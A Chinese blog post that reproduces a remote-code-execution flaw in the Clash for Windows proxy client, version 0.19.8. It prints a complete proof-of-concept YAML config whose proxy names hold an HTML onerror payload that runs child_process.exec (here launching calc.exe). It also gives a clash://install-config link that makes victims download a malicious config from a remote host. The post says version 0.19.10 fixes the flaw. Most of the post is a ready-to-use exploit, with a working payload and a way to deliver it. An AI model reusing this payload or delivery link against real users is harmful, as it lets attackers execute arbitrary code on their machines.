首页 杂七杂八

一、漏洞描述

Clash:一个 Go 语言开发的多平台代理客户端

二、漏洞复现

1.复现环境下载地址
https://github.com/Fndroid/clash_for_windows_pkg/releases
2.测试使用的版本是0.19.8版本下载后一直下一步进行安装

请输入图片描述

3.漏洞poc
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
4.新建一任意txt将文本写进去后将文件后缀改为.yaml

请输入图片描述

5.导入poc文件

请输入图片描述

6.运行运行对应的yaml文件

请输入图片描述

7.复现成功

请输入图片描述

三、利用方式

将恶意的配置文件放到互联网上并用于安装它,clash_for_windows_pkg将自动下载并切换到它。clash://
如:

clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE

经测试在2022.02.25更新的0.19.10版本该漏洞已经修复




文章评论

目录